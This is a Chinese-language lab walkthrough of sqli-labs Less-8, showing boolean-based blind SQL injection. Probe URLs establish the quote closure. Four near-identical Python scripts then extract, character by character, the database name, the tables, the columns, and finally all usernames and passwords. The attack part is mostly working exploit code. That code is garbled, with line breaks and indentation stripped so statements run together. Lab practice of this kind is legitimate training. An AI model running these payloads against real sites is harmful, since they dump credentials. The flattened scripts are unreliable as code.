SQL注入实例(sqli-labs/less-8)
0、初始页面
1、确定闭合字符
?id=1 and 1=1
?id=1 and 1=2
?id=1'
?id=1' and 1=1 --+
?id=1' and 1=2 --+
确定闭合字符为单引号,并且正确页面与错误页面的显示不同
2、爆库名
使用python脚本
def inject_database1(url):name = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(),%d,1)) > %d -- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)
3、爆表名
使用python脚本
def inject_database1(url):name = ''for i in range(1, 40):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1)) > %d -- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)
4、爆列名
使用python脚本
def inject_database1(url):name = ''for i in range(1, 150):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1)) > %d -- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)
5、显示最终结果
使用python脚本
def inject_database1(url):name = ''for i in range(1, 150):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr((select group_concat(username,0x3a,password) from users),%d,1)) > %d -- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)